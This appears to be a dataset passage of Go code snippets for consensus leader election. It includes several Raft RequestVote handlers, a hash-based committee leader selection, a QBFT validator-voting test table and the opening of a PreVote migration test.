{\n\t\t\tif len(rf.log) > args.LastLogIndex {\n\t\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treply.Term = rf.currentTerm\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\t// requester's log is more up-to-date than requester's.\n\t// Then, we should check whether this server has voted for another server in the same term\n\tif stepdown {\n\t\trf.resetElectionTimeout()\n\t\t// now we need to reset the election timer.\n\t\trf.votedFor = args.CandidateId // First-come-first-served\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\t/* Section 5.5 :\n\t * The server may crash after it completing an RPC but before responsing, then it will receive the same RPC again after it restarts.\n\t * Raft RPCs are idempotent, so this causes no harm.\n\t */\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false // First-come-first-served, this server has voted for another server before.\n\t}\n\treply.Term = rf.currentTerm\n\treturn\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tgrantVote := false\n\trf.updateTerm(args.Term) // All servers: if args.Term > rf.currentTerm, set currentTerm, convert to follower\n\n\tswitch rf.state {\n\tcase Follower:\n\t\tif args.Term < rf.currentTerm {\n\t\t\tgrantVote = false\n\t\t} else if rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\t\tif len(rf.logs) == 0 {\n\t\t\t\tgrantVote = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tlastLogTerm := rf.logs[len(rf.logs) - 1].Term\n\t\t\tif (lastLogTerm == args.LastLogTerm && len(rf.logs) <= args.LastLogIndex) || lastLogTerm < args.LastLogTerm {\n\t\t\t\tgrantVote = true\n\t\t\t}\n\t\t}\n\tcase Leader:\n\t\t// may need extra operation since the sender might be out-dated\n\tcase Candidate:\n\t\t// reject because rf has already voted for itself since it's in\n\t\t// Candidate state\n\t}\n\n\tif grantVote {\n\t\t// DPrintf(\"Peer %d: Granted RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\t// reset election timeout\n\t\trf.hasHeartbeat = true\n\t} else {\n\t\t// DPrintf(\"Peer %d: Rejected RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = false\n\t}\n\treply.VotersTerm = rf.currentTerm\n\n\t// when deal with cluster member changes, may also need to reject Request\n\t// within MINIMUM ELECTION TIMEOUT\n}", "func leaderElection(nodeCtx *NodeCtx) {\n\t// The paper doesnt specifically mention any leader election protocols, so we assume that the leader election protocol\n\t// used in bootstrap is also used in the normal protocol, with the adition of iteration (unless the same leader would\n\t// be selected).\n\n\t// TODO actually add a setup phase where one must publish their hash. This way there will always\n\t// be a leader even if some nodes are offline. But with the assumption that every node is online\n\t// this works fine.\n\n\t// get current randomness\n\trecBlock := nodeCtx.blockchain.getLastReconfigurationBlock()\n\trnd := recBlock.Randomness\n\n\t// get current iteration\n\t_currIteration := nodeCtx.i.getI()\n\tcurrI := make([]byte, 8)\n\tbinary.LittleEndian.PutUint64(currI, uint64(_currIteration))\n\n\tlistOfHashes := make([]byte32sortHelper, len(nodeCtx.committee.Members))\n\t// calculate hash(id | rnd | currI) for every member\n\tii := 0\n\tfor _, m := range nodeCtx.committee.Members {\n\t\tconnoctated := byteSliceAppend(m.Pub.Bytes[:], rnd[:], currI)\n\t\thsh := hash(connoctated)\n\t\tlistOfHashes[ii] = byte32sortHelper{m.Pub.Bytes, hsh}\n\t\tii++\n\t}\n\n\t// sort list\n\tlistOfHashes = sortListOfByte32SortHelper(listOfHashes)\n\n\t// calculate hash of self\n\tselfHash := hash(byteSliceAppend(nodeCtx.self.Priv.Pub.Bytes[:], rnd[:], currI))\n\t// fmt.Println(\"self: \", bytes32ToString(selfHash), bytes32ToString(nodeCtx.self.Priv.Pub.Bytes))\n\t// for i, lof := range listOfHashes {\n\t// \tfmt.Println(i, bytes32ToString(lof.toSort), bytes32ToString(lof.original))\n\t// }\n\n\t// the leader is the lowest in list except if selfHash is lower than that.\n\t// fmt.Println(byte32Operations(selfHash, \"<\", listOfHashes[0].toSort))\n\tif byte32Operations(selfHash, \"<\", listOfHashes[0].toSort) {\n\t\tnodeCtx.committee.CurrentLeader = nodeCtx.self.Priv.Pub\n\t\tlog.Println(\"I am leader!\", nodeCtx.amILeader())\n\t} else {\n\t\tleader := listOfHashes[0].original\n\t\tnodeCtx.committee.CurrentLeader = nodeCtx.committee.Members[leader].Pub\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\n\t//If RPC request or response contains term T > currentTerm:\n\t//set currentTerm = T, convert to follower\n\tif (args.Term > currentTerm) {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = NILVOTE\n\n\t\tif rf.role == LEADER {\n\t\t\tDPrintf(\"LeaderCondition sorry server %d term %d not a leader, logs %v, commitIndex %d\\n\",rf.me, rf.currentTerm, rf.log, rf.commitIndex) \n\t\t} \n\t\trf.role = FOLLOWER\n\t\trf.persist()\n\t}\n\n\tif args.Term < currentTerm {\n\t\t// Reply false if term < currentTerm \n\t\treply.VoteGranted = false\n\t\treply.Term = currentTerm \n\t}else {\n\t\t//If votedFor is null or candidateId,\n\t\t//and candidate’s log is at least as up-to-date as receiver’s log,\n\t\t//&& rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm)\n\t\tif (rf.votedFor == NILVOTE || rf.votedFor == args.CandidateId) && rf.atLeastUptodate(args.LastLogIndex, args.LastLogTerm) {\n\t\t\ti , t := rf.lastLogIdxAndTerm()\n\t\t\tPrefixDPrintf(rf, \"voted to candidate %d, args %v, lastlogIndex %d, lastlogTerm %d\\n\", args.CandidateId, args, i, t)\n\t\t\trf.votedFor = args.CandidateId\n\t\t\trf.persist()\t\n\t\t\treply.VoteGranted = true\n\t\t\treply.Term = rf.currentTerm\n\t\t\t//you grant a vote to another peer.\n\t\t\trf.resetTimeoutEvent = makeTimestamp()\n\t\t}else {\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t}\t\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\tif args == nil {\n\t\tDPrintf(\"Peer-%d received a null vote request.\", rf.me)\n\t\treturn\n\t}\n\tcandidateTerm := args.Term\n\tcandidateId := args.Candidate\n\tDPrintf(\"Peer-%d received a vote request %v from peer-%d.\", rf.me, *args, candidateId)\n\tif candidateTerm < currentTerm {\n\t\tDPrintf(\"Peer-%d's term=%d > candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\treply.Term = currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if candidateTerm == currentTerm {\n\t\tif rf.voteFor != -1 && rf.voteFor != candidateId {\n\t\t\tDPrintf(\"Peer-%d has grant to peer-%d before this request from peer-%d.\", rf.me, rf.voteFor, candidateId)\n\t\t\treply.Term = currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t\tDPrintf(\"Peer-%d's term=%d == candidate's term=%d, to check index.\\n\", rf.me, currentTerm, candidateTerm)\n\t} else {\n\t\tDPrintf(\"Peer-%d's term=%d < candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\t// begin to update status\n\t\trf.currentTerm = candidateTerm // find larger term, up to date\n\t\trf.transitionState(NewTerm) // transition to Follower.\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm // tell the electionService to change state.\n\t\t}()\n\t}\n\t// check whose log is up-to-date\n\tcandiLastLogIndex := args.LastLogIndex\n\tcandiLastLogTerm := args.LastLogTerm\n\tlocalLastLogIndex := len(rf.log) - 1\n\tlocalLastLogTerm := -1\n\tif localLastLogIndex >= 0 {\n\t\tlocalLastLogTerm = rf.log[localLastLogIndex].Term\n\t}\n\t// check term first, if term is the same, then check the index.\n\tDPrintf(\"Peer-%d try to check last entry, loacl: index=%d;term=%d, candi: index=%d,term=%d.\", rf.me, localLastLogIndex, localLastLogTerm, candiLastLogIndex, candiLastLogTerm)\n\tif localLastLogTerm > candiLastLogTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if localLastLogTerm == candiLastLogTerm {\n\t\tif localLastLogIndex > candiLastLogIndex {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t} else {\n\t}\n\t// heartbeat.\n\tgo func() {\n\t\trf.eventChan <- HeartBeat\n\t}()\n\t// local log are up-to-date, grant\n\t// before grant to candidate, we should reset ourselves state.\n\trf.transitionState(NewLeader)\n\trf.voteFor = candidateId\n\treply.Term = rf.currentTerm\n\treply.VoteGrant = true\n\tDPrintf(\"Peer-%d grant to peer-%d.\", rf.me, candidateId)\n\trf.persist()\n\treturn\n}", "func (a *RPC) VoteForLeader(args *VoteInfo,reply *bool) error{\n\t\n\tse := r.GetServer(r.id)\n\tif ( (args.ElectionTerm >= r.currentTerm) && (args.LastCommit >= se.LsnToCommit) && (args.ElectionTerm != r.votedTerm) && se.isLeader==2){\n\t\tr.votedTerm=args.ElectionTerm\n\t\t*reply = true\n\t} else {\n\t\t*reply = false\n\t}\nreturn nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.executeLock.Lock()\n\tdefer rf.executeLock.Unlock()\n\n\t//DPrintf(\"[ReceiveRequestVote] [me %v] from [peer %v] start\", rf.me, args.CandidateId)\n\trf.stateLock.Lock()\n\n\tdebugVoteArgs := &RequestVoteArgs{\n\t\tTerm: rf.currentTerm,\n\t\tCandidateId: rf.votedFor,\n\t\tLastLogIndex: int32(len(rf.log) - 1),\n\t\tLastLogTerm: rf.log[len(rf.log)-1].Term,\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %#v] self info: %#v from [peer %#v] start\", rf.me, debugVoteArgs, args)\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\treply.LastLog = int32(len(rf.log) - 1)\n\treply.LastLogTerm = rf.log[reply.LastLog].Term\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v <= currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\n\tconvrt2Follower := false\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tconvrt2Follower = true\n\t\trf.persist()\n\t}\n\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\tlastLogIndex := int32(len(rf.log) - 1)\n\t\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\t\tif args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\t\trf.votedFor = -1\n\t\t\trf.lastHeartbeat = time.Now()\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] index from [%v] is oldest, return\", rf.me, args.CandidateId)\n\n\t\t\tif convrt2Follower && rf.role != _Follower {\n\t\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v (non-follower) > currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\t\t\trf.role = _Unknown\n\t\t\t\trf.stateLock.Unlock()\n\t\t\t\tselect {\n\t\t\t\tcase <-rf.closeCh:\n\t\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\trf.stateLock.Unlock()\n\t\t\treturn\n\t\t}\n\n\t\trf.votedFor = args.CandidateId\n\t\t// [WARNING] 一旦授权,应该重置超时\n\t\trf.lastHeartbeat = time.Now()\n\t\treply.VoteGranted = true\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] granted vote for %v\", rf.me, args.CandidateId)\n\t\tif rf.role != _Follower {\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] become follower\", rf.me)\n\t\t\trf.role = _Unknown\n\t\t\trf.stateLock.Unlock()\n\t\t\tselect {\n\t\t\tcase <-rf.closeCh:\n\t\t\t\treturn\n\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %v] have voted: %v, return\", rf.me, rf.votedFor)\n\trf.stateLock.Unlock()\n}", "func TestVoting(t *testing.T) {\n\t// Define the various voting scenarios to test\n\ttests := []struct {\n\t\tepoch uint64\n\t\tvalidators []string\n\t\tvotes []testerVote\n\t\tresults []string\n\t}{\n\t\t{\n\t\t\t// Single validator, no votes cast\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{{validator: \"A\"}},\n\t\t\tresults: []string{\"A\"},\n\t\t}, {\n\t\t\t// Single validator, voting to add two others (only accept first, second needs 2 votes)\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Two validators, voting to add three others (only accept first two, third needs 3 votes already)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"E\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"E\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Single validator, dropping itself (weird, but one less cornercase by explicitly allowing this)\n\t\t\tvalidators: []string{\"A\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"A\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{},\n\t\t}, {\n\t\t\t// Two validators, actually needing mutual consent to drop either of them (not fulfilled)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Two validators, actually needing mutual consent to drop either of them (fulfilled)\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\"},\n\t\t}, {\n\t\t\t// Three validators, two of them deciding to drop the third\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Four validators, consensus of two not being enough to drop anyone\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Four validators, consensus of three already being enough to drop someone\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Authorizations are counted once per validator per target\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Authorizing multiple accounts concurrently is permitted\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: true},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t}, {\n\t\t\t// Deauthorizations are counted once per validator per target\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Deauthorizing multiple accounts concurrently is permitted\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Votes from deauthorized validators are discarded immediately (deauth votes)\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"C\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Votes from deauthorized validators are discarded immediately (auth votes)\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"C\", voted: \"B\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"A\", voted: \"B\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Cascading changes are not allowed, only the the account being voted on may change\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Changes reaching consensus out of bounds (via a deauth) execute on touch\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"C\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t}, {\n\t\t\t// Changes reaching consensus out of bounds (via a deauth) may go out of consensus on first touch\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: false},\n\t\t\t\t{validator: \"C\"},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"D\", auth: false},\n\t\t\t\t{validator: \"A\"},\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\", \"C\"},\n\t\t}, {\n\t\t\t// Ensure that pending votes don't survive authorization status changes. This\n\t\t\t// corner case can only appear if a validator is quickly added, remove and then\n\t\t\t// readded (or the inverse), while one of the original voters dropped. If a\n\t\t\t// past vote is left cached in the system somewhere, this will interfere with\n\t\t\t// the final validator outcome.\n\t\t\tvalidators: []string{\"A\", \"B\", \"C\", \"D\", \"E\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"F\", auth: true}, // Authorize F, 3 votes needed\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"C\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"D\", voted: \"F\", auth: false}, // Deauthorize F, 4 votes needed (leave A's previous vote \"unchanged\")\n\t\t\t\t{validator: \"E\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"C\", voted: \"F\", auth: false},\n\t\t\t\t{validator: \"D\", voted: \"F\", auth: true}, // Almost authorize F, 2/3 votes needed\n\t\t\t\t{validator: \"E\", voted: \"F\", auth: true},\n\t\t\t\t{validator: \"B\", voted: \"A\", auth: false}, // Deauthorize A, 3 votes needed\n\t\t\t\t{validator: \"C\", voted: \"A\", auth: false},\n\t\t\t\t{validator: \"D\", voted: \"A\", auth: false},\n\t\t\t\t{validator: \"B\", voted: \"F\", auth: true}, // Finish authorizing F, 3/3 votes needed\n\t\t\t},\n\t\t\tresults: []string{\"B\", \"C\", \"D\", \"E\", \"F\"},\n\t\t}, {\n\t\t\t// Epoch transitions reset all votes to allow chain checkpointing\n\t\t\tepoch: 3,\n\t\t\tvalidators: []string{\"A\", \"B\"},\n\t\t\tvotes: []testerVote{\n\t\t\t\t{validator: \"A\", voted: \"C\", auth: true},\n\t\t\t\t{validator: \"B\"},\n\t\t\t\t{validator: \"A\"}, // Checkpoint block, (don't vote here, it's validated outside of snapshots)\n\t\t\t\t{validator: \"B\", voted: \"C\", auth: true},\n\t\t\t},\n\t\t\tresults: []string{\"A\", \"B\"},\n\t\t},\n\t}\n\n\t// Run through the scenarios and test them\n\tfor i, tt := range tests {\n\t\t// Create the account pool and generate the initial set of validators\n\t\taccounts := newTesterAccountPool()\n\n\t\tvalidators := make([]common.Address, len(tt.validators))\n\t\tfor j, validator := range tt.validators {\n\t\t\tvalidators[j] = accounts.address(validator)\n\t\t}\n\t\tfor j := 0; j < len(validators); j++ {\n\t\t\tfor k := j + 1; k < len(validators); k++ {\n\t\t\t\tif bytes.Compare(validators[j][:], validators[k][:]) > 0 {\n\t\t\t\t\tvalidators[j], validators[k] = validators[k], validators[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tgenesis := testutils.Genesis(validators, true)\n\t\tconfig := new(istanbul.Config)\n\t\t*config = *istanbul.DefaultConfig\n\t\tconfig.TestQBFTBlock = big.NewInt(0)\n\t\tif tt.epoch != 0 {\n\t\t\tconfig.Epoch = tt.epoch\n\t\t}\n\n\t\tchain, backend := newBlockchainFromConfig(\n\t\t\tgenesis,\n\t\t\t[]*ecdsa.PrivateKey{accounts.accounts[tt.validators[0]]},\n\t\t\tconfig,\n\t\t)\n\n\t\t// Assemble a chain of headers from the cast votes\n\t\theaders := make([]*types.Header, len(tt.votes))\n\t\tfor j, vote := range tt.votes {\n\t\t\tblockNumber := big.NewInt(int64(j) + 1)\n\t\t\theaders[j] = &types.Header{\n\t\t\t\tNumber: blockNumber,\n\t\t\t\tTime: uint64(int64(j) * int64(config.GetConfig(blockNumber).BlockPeriod)),\n\t\t\t\tCoinbase: accounts.address(vote.validator),\n\t\t\t\tDifficulty: istanbulcommon.DefaultDifficulty,\n\t\t\t\tMixDigest: types.IstanbulDigest,\n\t\t\t}\n\t\t\t_ = qbftengine.ApplyHeaderQBFTExtra(\n\t\t\t\theaders[j],\n\t\t\t\tqbftengine.WriteValidators(validators),\n\t\t\t)\n\n\t\t\tif j > 0 {\n\t\t\t\theaders[j].ParentHash = headers[j-1].Hash()\n\t\t\t}\n\n\t\t\tcopy(headers[j].Extra, genesis.ExtraData)\n\n\t\t\tif len(vote.voted) > 0 {\n\t\t\t\tif err := accounts.writeValidatorVote(headers[j], vote.validator, vote.voted, vote.auth); err != nil {\n\t\t\t\t\tt.Errorf(\"Error writeValidatorVote test: %d, validator: %s, voteType: %v (err=%v)\", j, vote.voted, vote.auth, err)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// Pass all the headers through clique and ensure tallying succeeds\n\t\thead := headers[len(headers)-1]\n\n\t\tsnap, err := backend.snapshot(chain, head.Number.Uint64(), head.Hash(), headers)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"test %d: failed to create voting snapshot: %v\", i, err)\n\t\t\tbackend.Stop()\n\t\t\tcontinue\n\t\t}\n\t\t// Verify the final list of validators against the expected ones\n\t\tvalidators = make([]common.Address, len(tt.results))\n\t\tfor j, validator := range tt.results {\n\t\t\tvalidators[j] = accounts.address(validator)\n\t\t}\n\t\tfor j := 0; j < len(validators); j++ {\n\t\t\tfor k := j + 1; k < len(validators); k++ {\n\t\t\t\tif bytes.Compare(validators[j][:], validators[k][:]) > 0 {\n\t\t\t\t\tvalidators[j], validators[k] = validators[k], validators[j]\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tresult := snap.validators()\n\t\tif len(result) != len(validators) {\n\t\t\tt.Errorf(\"test %d: validators mismatch: have %x, want %x\", i, result, validators)\n\t\t\tbackend.Stop()\n\t\t\tcontinue\n\t\t}\n\t\tfor j := 0; j < len(result); j++ {\n\t\t\tif !bytes.Equal(result[j][:], validators[j][:]) {\n\t\t\t\tt.Errorf(\"test %d, validator %d: validator mismatch: have %x, want %x\", i, j, result[j], validators[j])\n\t\t\t}\n\t\t}\n\t\tbackend.Stop()\n\t}\n}", "func newPreVoteMigrationCluster(t *testing.T) *network {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\t// We intentionally do not enable PreVote for n3, this is done so in order\n\t// to simulate a rolling restart process where it's possible to have a mixed\n\t// version cluster with replicas with PreVote enabled, and replicas without.\n\n\tnt := newNetwork(n1, n2, n3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// Cause a network partition to isolate n3.\n\tnt.isolate(3)\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\t// check state\n\t// n1.state == StateLeader\n\t// n2.state == StateFollower\n\t// n3.state == StateCandidate\n\tif n1.state != StateLeader 